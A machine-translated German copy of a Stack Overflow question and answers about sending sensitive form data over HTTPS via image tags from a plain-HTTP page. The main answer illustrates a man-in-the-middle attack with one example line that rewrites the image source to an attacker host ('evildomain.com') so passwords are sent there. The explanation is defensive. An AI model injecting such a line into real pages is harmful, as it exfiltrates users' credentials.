http, https und Ajax-Bypass, vielleicht?
https://stackoverflow.com/questions/1541329
-
20-09-2019 - |
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
RussianFrage
Ich habe ein Skript, Server, dass ich Daten aus dem Browser übergeben müssen, ohne die Seite neu zu laden (auch bekannt als Ajax). Die Daten sind empfindlich, so sollte über https gesendet werden. Die Seite ist jedoch auf der http-Schicht. Wegen der gleichen Domäne / Protokoll Einschränkung, wird der Browser nicht zulassen.
Ich denke, das System ein bisschen Betrug durch dynamischen Bild-Tags erstellen und rufen Sie das Skript des src-Tag wie:
<img src="https://mydomain.com/mysecurescript/&data=to&pass=to&my=script" />
Ich würde gerne wissen, ob dies in der Tat richtig verschlüsselt wird.
Lösung
Das Problem dabei ist, wenn die Seite selbst nur HTTP ist, dann Sie ist anfällig für einen Mann in der Mitte Angriff. Ein Angreifer kann das Skript in der Seite nur ändern HTTP geschickt, so dass es verwendet stattdessen:
<img src="http://evildomain.com/evilproxyscript/&data=to&pass=to&my=script" />
Der Benutzer wird nichtsdesto klüger sein. Um dies zu umgehen müssen Sie wirklich die Seite über HTTPS dienen -. Die ordentlich Ihr anderes Problem zugleich löst
(Dies ist genau der gleiche Grund, warum Login-Formulare auf HTTPS sollten Seiten, und nicht nur die Form Aktion zu sein HTTPS).
Andere Tipps
Ja und nein.
Der Server-Adresse Teil der URL ist offensichtlich nicht verschlüsselt, da es verwendet wird, um die Verbindung aufzubauen.
Alles andere ist verschlüsselt, während über HTTPS-Verbindung gesendet werden. Aber wer die Quelle sehen wird offensichtlich in der Lage sein, die Daten zu sehen, geschrieben zu werden.
Es trägt auch zu erwähnen, dass einige Browser angezeigt wird (der Benutzer oder warnt vor der Anzeige) nicht im gemischten Modus (http vs. https) HTML-Seiten. In einigen Fällen kann dies nicht funktionieren, weil der Benutzer auswählt, es zu blockieren.
Eine mögliche Alternative zu der Bildtechnik (der Nachteil, der, wie von anderen erwähnt, ist, dass Mixed-Mode-Inhalt nicht freundlicherweise von einigen Browsern behandelt wird) würde von ASSL .
Jede Methode bei der Verschlüsselung geschieht führen, und beide sind immer noch anfällig für Menschen in den Middle-Angriffen.
